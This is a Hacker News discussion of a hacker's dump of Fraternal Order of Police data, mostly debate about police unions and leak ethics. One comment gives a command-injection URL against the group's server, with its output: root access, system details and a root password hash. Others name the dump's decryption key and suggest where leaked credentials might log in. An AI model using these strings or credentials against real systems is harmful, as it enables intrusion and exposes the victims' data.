
Fraternal Order of Police Data Dump - hendi_
https://fop.thecthulhu.com/
======
malchow
Speaking as a taxpayer, it does not seem to me at all clear why collective
bargaining agreements between public servants and city governments should be
able to be private documents at all. We pay the bills, after all.

~~~
eplanit
I agree. Collective bargaining for public workers is overall absurd, IMHO. It
injects a layer (the union) between the voters/citizens and the public
employees. We don't get to elect/control the union or see their dealings? BS!

~~~
CPLX
So labor should just take whatever management and politicians feel like giving
them like obedient little servants? How has that worked out in the past? Do we
feel that the civil service is sufficiently isolated from rapidly changing
political pressures to ensure the rights of workers and to avoid the inherent
issues involved in political control of a large group of government workers?

~~~
rayiner
> So labor should just take whatever management and politicians feel like
> giving them like obedient little servants?

When you're the boss (which you are when it comes to public workers), that's
exactly what you want. Do you wish your cops were something other than
"obedient little servants?" Doesn't it seem like the whole problem with cops
in the U.S. is that they don't think they work for you?

~~~
toomuchtodo
I want all labor to be paid appropriately, cops included.

I _do not_ want them protected when they've violated the law, or are grossly
negligent in their duties.

Can't unions negotiate for fair wages while also throwing the bad apples to
the wolves?

~~~
protomyth
> Can't unions negotiate for fair wages while also throwing the bad apples to
> the wolves?

No, not really. It's the nature of the beast that unions need to protect all
their members. A noble goal with a noble origin, but it gets pretty perverted
in the extreme it's been taken to. For example, school union members that are
no longer allowed to teach students but cannot be fired (search on cases in
both LA and NYC). You would think rationality would prevail but then you run
into the other problem.

Union membership totals determine power. More members, more money to lobby,
which gives you more influence. There is a reason the California Correctional
Peace Officers Association continues to advocate for laws that will put more
people in jail.

At this point, for government workers, we as a country would be much better
off without government workers' unions.

~~~
Symbiote
It's the nature of the beast that corporations exploit their staff. Or
something.

If you have extreme situations like this, something is badly wrong, but
removing all unions isn't the solution. Instead, add more: convince people to
join a more moderate union.

~~~
protomyth
> It's the nature of the beast that corporations exploit their staff. Or
> something.

I mentioned corporations not once, and this is about transparency in
government.

> If you have extreme situations like this, something is badly wrong, but
> removing all unions isn't the solution. Instead, add more: convince people
> to join a more moderate union.

I would contend that there is no such thing as a moderate union in this
situation. I would be curious if you had any history of "convince people to
join a more moderate union"? I am inclined to think rayiner is correct and no
incentive exists.

Beyond this, we are their employers and the people who pay their wages. An
organization interfering with transparency and accountability does not serve
the public good.

~~~
Symbiote
I assumed corporations were relevant as much of this discussion has been
saying unions should be banned for the public sector, implying that they're
acceptable in the private sector. It's also where unions started.

Anyway.

At my previous job, in the British public sector, there were three unions who
represented the staff, and I joined the one the others in my office had
joined. Initially, this was because I appreciated the support a union had
given someone in my family against a bad manager. Later, I stayed in the union
in support of those with much less skill than me — the union was campaigning
against "zero hours" contracts¹.

A year or two ago, the government imposed significant cuts. (Contrary to a lot
of posts in this thread, government budget for salaries isn't unlimited.) I
found out that my union seemed to be prolonging the negotiations
unnecessarily, by being needlessly difficult — submitting 1000-page documents
in the last hour of a 3-month consultation, for example, which had no more
content than a 5 page document on the first day. Most staff I spoke to were
more interested in knowing whether their job was ending, rather than hanging
on for an extra month's pay during negotiations. (We already had 1-3 month
notice periods.) I left the union, and didn't join another. Several colleagues
left, and joined the more reasonable union.

For another example, the RMT is the more extreme union representing London
Underground employees, ASLEF is more moderate (there are others, these are the
two biggest, and not all staff are in a union).

Quoting from [2], just as an example, "The RMT has attacked a fellow Tube
union for failing to call strike action as part of the ongoing Night Tube
dispute. The RMT accused ASLEF of being "happy" with alleged assurances that
London Underground (LU) would put forward new work rosters for drivers." And
just look at the language in the RMT newsletter "only resolute determination
will prevail...".

RMT goes on strike much more often, and makes a lot of noise about it, but most
of the staff in that union are less essential (ticket checking, platform
staff, etc) and the trains keep on running. The train drivers generally belong
to ASLEF, which is still a powerful union, but rarely tries to defend drunk
drivers or similar.

[1] [https://en.wikipedia.org/wiki/Zero-hour_contract#United_Kingdom](https://en.wikipedia.org/wiki/Zero-hour_contract#United_Kingdom)

[2] [http://www.ibtimes.co.uk/tube-strikes-rmt-attacks-train-drivers-union-aslef-over-night-tube-dispute-1516170](http://www.ibtimes.co.uk/tube-strikes-rmt-attacks-train-drivers-union-aslef-over-night-tube-dispute-1516170)

------
ryanlol
Haven't dled the dump yet, but if it contains credentials some of them will
probably work at
[https://email.fop.net/postfixadmin/users/login.php](https://email.fop.net/postfixadmin/users/login.php)

cve-2012-0811 yo

Clearly it's no wonder that these guys got hacked.

See also:
[https://news.ycombinator.com/item?id=10990193](https://news.ycombinator.com/item?id=10990193)
[http://fop.net/servlet/util/util.jsp?cmd=id;uname+-a;cat+/et...](http://fop.net/servlet/util/util.jsp?cmd=id;uname+-a;cat+/etc/shadow&html=true&pass=secret)

    
    
      uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
      Linux data.fop.net 2.6.18-407.el5 #1 SMP Wed Nov 11 08:12:41 EST 2015 x86_64 x86_64 x86_64 GNU/Linux
      root:$1$04KmnGtM$V0naSp94MiVAQUpoBH.fI1:16828:0:99999:7:::

thanks to user thisisthepolice for the above ;)

Edit: I sure hope it wasn't someone from here that turned the server off.
That's, like, several felonies.

~~~
sarciszewski
That's illegal.

EDIT: In case the OP gets rm'd:

[https://archive.is/fyHfC](https://archive.is/fyHfC)

[https://web.archive.org/web/20160128190623/https://news.ycom...](https://web.archive.org/web/20160128190623/https://news.ycombinator.com/item?id=10989900)

[http://www.webcitation.org/6escqonB6](http://www.webcitation.org/6escqonB6)

~~~
ryanlol
Yeah possibly, but this SHOULD be illegal:

[http://www.fop.net/servlet/listing/news_article?user_id=-1&n...](http://www.fop.net/servlet/listing/news_article?user_id=-1&nocache=1765055&XSL=xsl_pages/members/member_news_listing.xsl)

Note the convenient "Admin Tools" button :)

~~~
sarciszewski
Wow what the fuck. Who programmed their website?

~~~
ryanlol
A time traveller.

(Just to clarify, from the past.)

~~~
sarciszewski
[http://www.fop.net/servlet/display/donation?XSL=xsl_pages/pu...](http://www.fop.net/servlet/display/donation?XSL=xsl_pages/public/foundation.xsl)

Yes hello, I'd like to donate with my credit card number over HTTP. Quick,
nobody tell PCI!

~~~
pc86
No it's okay it's a servlet.

------
pavel_lishin
> _Don't bother with legal threats or trying to get UK law enforcement to
> seek revenge. This is me playing nice. If you want to go nuclear with me,
> feel free to do so, but trust me when I say you might want to think long and
> hard before you do._

> _I'm not known for bluffing, and I know many more of your secrets. About
> 18TB all in all actually, all unpublished yet._

I wonder what's in the unpublished docs, and why they're remaining
unpublished.

~~~
PantaloonFlames
Who has time to go through 18TB of data? The guy probably hasn't even viewed
the data. Maybe it includes information from PC hard drives and he doesn't
want to just release it without review.

~~~
dev1n
A topic analysis using LDA would be pretty neat. It would take a really really
long time with 18TB of text but in general it would be pretty cool to get an
overall picture of what, generally, is in those docs. For those parties who
are interested. Generally speaking of course..

------
sarciszewski
In case the main story goes down, here are several mirrors:

[https://web.archive.org/web/20160128183444/https://fop.thect...](https://web.archive.org/web/20160128183444/https://fop.thecthulhu.com/)

[http://www.webcitation.org/6esai2UHY](http://www.webcitation.org/6esai2UHY)

[https://archive.is/https://fop.thecthulhu.com/](https://archive.is/https://fop.thecthulhu.com/)

------
chippy
Ten days ago he was in custody and released by the UK police (and Intelligence
folks)

[https://www.thecthulhu.com/insurance-release/](https://www.thecthulhu.com/insurance-release/)

Why? Possibly due to his release of his "insurance" dump - a dump containing
unknown stuff.

Why release this bigger archive after then? No idea but I'm not touching
either with any type of stick!

~~~
pjc50
Do we have any third-party reports on what happened there?

------
travjones
Wow. This is going to be interesting... The page even includes the key to
decrypt the encrypted fields in the dump. Is pg_crypto that easy to crack, or
is it more likely the key was stored somewhere in plaintext (e.g., email, pdf,
etc.)?

~~~
infogulch
The key is "Nipper47". Only 8 characters in the standard "short english-ish
word starting with a capital letter followed by a couple numbers"-pattern. I'd
say it's less that pg_crypto is easy to crack, and more that the key is
trivially insecure and easy to brute-force. But sibling is probably right that
it was just sitting there.

~~~
_asdf_asdf
8 chars, including numeric, uppercase and lowercase...

With sufficient GPU resources (being in possession of a working rig, cloud-
based or standalone and air-gapped, all powered-up and running operable
software) and talent (experience, and familiarity with an existing framework
and an established code base), I'm thinking one person could brute force that,
in the privacy of their own home, in a trivial amount of time.

~~~
infogulch
> one person could brute force that, in the privacy of their own home, in a
> trivial amount of time.

Yes. And that's assuming your pattern (26+26+10)^8 ~ 2e14, but the basic
character pattern here is 26 * 26^5 * 10^2 ~ 3e10, almost 10000 times weaker.
This is an extremely common pattern, most passwords don't follow a uniform
distribution of those "numeric, uppercase and lowercase" characters.

~~~
ikeboy
Or if nipper is in your dictionary (likely, there's a wikipedia page with that
title and there's only a handful of million articles, trivial to add every
title, or even every word), then assuming a dictionary of 10 million words,
the pattern is 2*e7*10*10, another order of magnitude reduction.
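
Added example (not part of the thread and not any commenter's code): the three keyspace estimates from the comments above, written as a small key-strength audit. The sample wordlist is constructed; the 10-million wordlist size comes from the last comment, and reading its leading factor of 2 as "capitalised or not" is an assumption.

```python
import math
import re
import string

# Size of each character class a position in the key can be drawn from.
CLASS_SIZES = {"U": 26, "l": 26, "d": 10, "s": len(string.punctuation)}

# Constructed sample wordlist; a real audit would load a full dictionary.
SAMPLE_WORDLIST = {"nipper", "police", "lodge"}


def mask_of(secret):
    """Per-position character-class mask, e.g. 'Nipper47' -> 'Ullllldd'."""
    tags = []
    for ch in secret:
        if ch in string.ascii_uppercase:
            tags.append("U")
        elif ch in string.ascii_lowercase:
            tags.append("l")
        elif ch in string.digits:
            tags.append("d")
        elif ch in string.punctuation:
            tags.append("s")
        else:
            raise ValueError(f"unsupported character: {ch!r}")
    return "".join(tags)


def uniform_keyspace(secret, alphabet=62):
    """Every position drawn uniformly from upper + lower + digits."""
    return alphabet ** len(secret)


def mask_keyspace(secret):
    """Guesser already tries this shape (true for common ones like Ullllldd)."""
    return math.prod(CLASS_SIZES[t] for t in mask_of(secret))


def dictionary_keyspace(secret, wordlist, wordlist_size=10_000_000,
                        case_variants=2):
    """Word + trailing digits model; None if the key does not have that shape."""
    m = re.fullmatch(r"([A-Za-z]+)(\d*)", secret)
    if not m or m.group(1).lower() not in wordlist:
        return None
    return case_variants * wordlist_size * 10 ** len(m.group(2))


def audit(secret, wordlist=SAMPLE_WORDLIST):
    """Return every applicable estimate and the weakest one in bits."""
    counts = {
        "uniform": uniform_keyspace(secret),
        "mask": mask_keyspace(secret),
    }
    dict_count = dictionary_keyspace(secret, wordlist)
    if dict_count is not None:
        counts["dictionary"] = dict_count
    weakest = min(counts, key=counts.get)
    return {
        "mask": mask_of(secret),
        "counts": counts,
        "weakest": weakest,
        "bits": round(math.log2(counts[weakest]), 1),
    }


if __name__ == "__main__":
    for key in ("Nipper47", "q7Vx2mRt"):  # second key is constructed
        print(key, audit(key))
```

The effective strength of a key is the smallest of these counts, not the uniform figure its length and character mix suggest.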

------
apo
Anyone care to give a summary of what the data dump contains?

~~~
dmix
I haven't downloaded it yet but it seems to be email and server(?) dumps from
the FOP website.

FOP = Fraternal Order of Police

[https://en.wikipedia.org/wiki/Fraternal_Order_of_Police](https://en.wikipedia.org/wiki/Fraternal_Order_of_Police)

Additionally, the hacker made a Q/A-style blog post which will answer your
questions:

[https://www.thecthulhu.com/fraternal-order-of-police-data-dump/](https://www.thecthulhu.com/fraternal-order-of-police-data-dump/)

------
colinbartlett
Is there any background here or are there any summaries of what is contained
in the documents?

~~~
rfrank
Don't have any background, but from what I've seen so far (a small handful of
the tons of docs) it's collective bargaining agreements between various police
unions and the cities they operate in. Haven't seen one more recent than 2012.

~~~
samstave
Search for "stingray" and "body cameras" in all docs please.

~~~
cmurf
drone money drugs swimming pool lawsuit lawyer illegal destroy ruin idiot
river tax fbi atf cia nsa irs

Lots of words to search for.

~~~
samstave
Sure,

But currently Stingray and Body Cameras are the two biggest contentious
technology issues with police at the moment.

Police in Chicago were caught destroying cameras and mics to avoid audio
recording and reporting.

Stingrays are seemingly getting reported weekly.

So, I think they are a good focus.

But - make a word cloud and see what's largest.

~~~
bpchaps
Been looking through it for a bit - found pretty much no mention in here
except for a few vague legalese.

Found this gem, though: Would you send me the AVL info. Our Chief has
indicated to us, not only can he track our locations from his home computer
and Blackberry using AVL, but can access the on board camera system as well.
This includes the ONLY interior car camera that ONLY monitors the driver.
That's right, it doesn't monitor the criminal in the back seat, just the
driver. He says this can only be done when the system is active such as on a
car stop. I am not aware of any incident in which he has done this.

He has also installed cameras in the station that only target the receptionist
in the enclosed office and the squad room where officers do their paperwork.
On occasion he has called the night dispatcher and commented on what she was
having for dinner and called the station to comment that he can see officers
talking and not typing. BIG BROTHER IS WATCHING.

I understand these cameras have been placed for "security" purposes. The
building is posted to inform people that video monitoring is in use. Is there
a limit to their use?
Re:Contract language covering use of AVL for discipline

~~~
cdcarter
That gem sounds like a union member asking his representative about
overreaching power of management for a purpose not traditionally thought of as
why cops need cams, so...checks out to me.

------
ihsw
We should expect the FBI to become involved if there is any credence to this,
and the domain name thecthulhu.com (Namecheap with WhoisGuard) should be taken
down shortly.

Heads will roll, that much is certain.

Does anyone have a file listing for this? Is it just a PGDATA dump, or are
there more interesting things?

~~~
she11c0de
> Does anyone have a file listing for this? Is it just a PGDATA dump, or are
> there more interesting things?

[http://pastebin.com/CZXikytZ](http://pastebin.com/CZXikytZ)

~~~
brador
> ├── GrandLodge_DB_backup.tar

Don't the Freemasons call their clubhouse a Grand Lodge?

~~~
fnordfnordfnord
More than one group uses that vernacular, but yeah that's a good context clue.
Freemasonry is frequently popular among law enforcement types.

------
anigbrowl
Thanks for this! I hate the FOP with a passion - it's a RICO as far as I'm
concerned and I look forward to the day when its leaders are rotting in jail
cells.

------
Dan_JiuJitsu
Without espousing an opinion one way or the other, I think the point that is
most striking to me is the relatively civilized manner we're all discussing a
contentious topic. Hats off to hackernews readers for navigating tough issues
with class!

------
mangeletti
I was JUST solicited by phone on the day before yesterday, by our local FOP in
Jupiter, FL.

Let me tell you how that went (I'll call the caller Albert, to avoid using his
real name):

Albert: Hi, <my full name>. This is Albert from the Jupiter Police
Department...

Me: Hi (...shit, did I cut somebody off and they called the cops?).

Albert: _[nothing for 3 seconds while I ruminate in my paranoia]_

Albert: Don't worry, there's nothing wrong. I'm calling about officers in
need. I'm from the Fraternal Order of Police... Each year we... yata yata...
we help officers that have been injured on the job and officers whose families
are in need... can you help us out?

Me: _[how does this guy know my mobile phone number and full name, anyway]_

Me: Possibly.

... some back and forth - him trying to convince me that the only amount that
can be accepted is $285. Me having patience, thinking about how, despite all
the police brutality reports out there, etc., there are also a lot of public
servants in need that are now doubly screwed by all the bad press, as a result
of the few that do bad things, also how the Jupiter Police Department has
always been really great compared to anywhere else I've lived... basically,
I'm sympathizing with the officers, rather than wondering what this FOP
organization is, and why they're being allowed to say they're calling FROM the
Jupiter Police Department.

Me: Ok, I'll donate $90.

... quick discussion about check / payable to, etc...

Albert: Ok, I've got you at <my address>. Is that correct?

Me: _[what, does the police department give him the address from my license?]_

Me: Yes.

Albert: Ok, I'll have our guy come pick up the check tomorrow.

The call basically ends there, but I'm left with this uncomfortable "well,
that guy seemed like a hustler to me" feeling. I do a quick search, pull up
their website, and immediately find that they offer legal services, etc.
Instantly, I'm thinking, "wait, I was just bamboozled into donating to a fund
that is probably used for lobbying / bargaining, and for protecting police
that are charged with murdering innocent people! I was donating to help
officers directly in need!". I called back and cancelled the donation.

Organizations like this are, sadly, basically large gangs, and they only serve
to ruin the establishments they "serve" by adding unnatural protections that
lead to corruption and abuse.

Note: My full name is on my profile page. I only mask it here, in case this
comment was, for some reason, copy/paste quoted on NYT or something
ridiculous.

~~~
uremog
Did you ever figure out how they know your address?

~~~
mangeletti
No, but I did register a business in FL last year, so it could very well have
been that.

------
geographomics
Seems rather impolite to be leaking all this data. Where's the benefit?

~~~
nitrogen
I think this is a fair question. From other comments it sounds like there are
union agreements that may not have been available before, and it can be argued
that the public should know what their governments have contracted with police
unions. Another item mentioned in other comments is what looks like a forum
database dump, so people could find out what the police say about various
subjects when they expect nobody to hear.

------
tyingq
Bookmarking this for future entertainment. I hope he got a dump of their
emails...that's probably where most of the interesting stuff is.

~~~
tyingq
If it's helpful, here's a good overview of why I'm experiencing Schadenfreude
over this:

[http://www.theatlantic.com/politics/archive/2014/12/how-police-unions-keep-abusive-cops-on-the-street/383258/](http://www.theatlantic.com/politics/archive/2014/12/how-police-unions-keep-abusive-cops-on-the-street/383258/)

~~~
sbarre
Ugh I got about half way through that article and had to close the browser
because it made me so angry.

------
tiredofhtebs
This planet will be pulverized by an asteroid before this 18TB is released in
plain text for the entire world to freely peruse. The entire hacker/anonymous
phenomenon is a complete fraud run by western intelligence/police agencies
with the corporate media’s cooperation.

------
5ilv3r
Ah, so that's where they hid all that undisclosed evidence! Thanks, Ed!

------
geobmx540
I need more popcorn for this

------
jimrandomh
IMPORTANT: This is a collection of files from an anonymous hacker including
file formats such as docx that are known for carrying malware. Safe handling
means opening them only on a virtual machine with nothing of value inside it
and no access to your internal network. You have been warned.

~~~
ryanlol
Oh come on, we might as well start posting this warning every time someone
links to any files on HN.

In fact, websites are known for carrying malware.

Especially considering that at the point where you have the docs you have
already opened the torrent, and torrent clients are known for being _super
secure_

~~~
brazzledazzle
I don't think there's any harm in a warning for binary files distributed by
someone who presumably broke the law to get them.

~~~
ryanlol
Did I say there's any harm? I just think it's silly, especially considering
that binary content is constantly posted here.

~~~
brazzledazzle
Context matters.

~~~
ryanlol
And what makes the files in this context stand out as particularly dangerous?

I don't know what kind of attacks you work with but in my experience people
usually try to be at least somewhat stealthy, this wouldn't be it.

And anyway, how would you even get those files without downloading the torrent
in the first place? Sounds like you might be placing _a little_ unwarranted
trust on your torrent client.

------
godzillabrennus
Security is just an illusion.

~~~
SixSigma
"We will make it more secure"

no, you will make it less insecure.

------
Kristine1975
Every year a huge leak. 2015 it was HackingTeam, 2016 it seems to be the FOP.

